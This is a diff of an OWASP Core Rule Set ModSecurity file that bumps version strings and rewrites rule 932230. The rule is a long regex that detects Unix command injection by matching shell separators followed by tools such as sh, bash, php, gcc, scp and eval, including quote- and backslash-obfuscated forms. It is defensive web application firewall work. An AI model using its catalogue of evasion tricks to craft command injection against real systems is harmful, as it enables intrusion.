-# Copyright (c) 2021-2024 CRS project. All rights reserved.
+# Copyright (c) 2021-2025 CRS project. All rights reserved.
 #
 # The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
@@ -14,8 +14,8 @@
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE"
 #
 # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
 #
@@ -119,7 +119,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,tag:'O
 # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
 #   crs-toolchain regex update 932230
 #
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[arx])?|(?:(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|x)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|[ckz][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?f|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|f[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[dg]|g[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[&,<>\|]|(?:[\-\.0-9A-Z_a-z][\"'\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\*\-0-9\?@_a-\{]*)?\x5c?)+[\s\x0b&,<>\|]).*|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:s|z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:4|[\s\x0b&\),<>\|].*))|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z)|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*)?|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|(?:e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?3[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m)\b" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[\s\x0b&\),<>\|]|$).*|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:7[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[arx][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?|(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?j|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[89][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?9|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?f|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|q[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|f[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[dg]|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s|q)|[kz][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|k[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z)|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?h|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:3[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|c)|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|z)|y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:4[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?))(?:[\s\x0b&\),<>\|]|$).*|g[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[&\),<>\|]|$){1,10}|(?:[\-\.0-9A-Z_a-z][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?){1,10}(?:[\s\x0b&\),<>\|]|$){1,10})|(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|[hr][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*))\b" \
     "id:932230,\
     phase:2,\
     block,\
@@ -133,9 +133,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
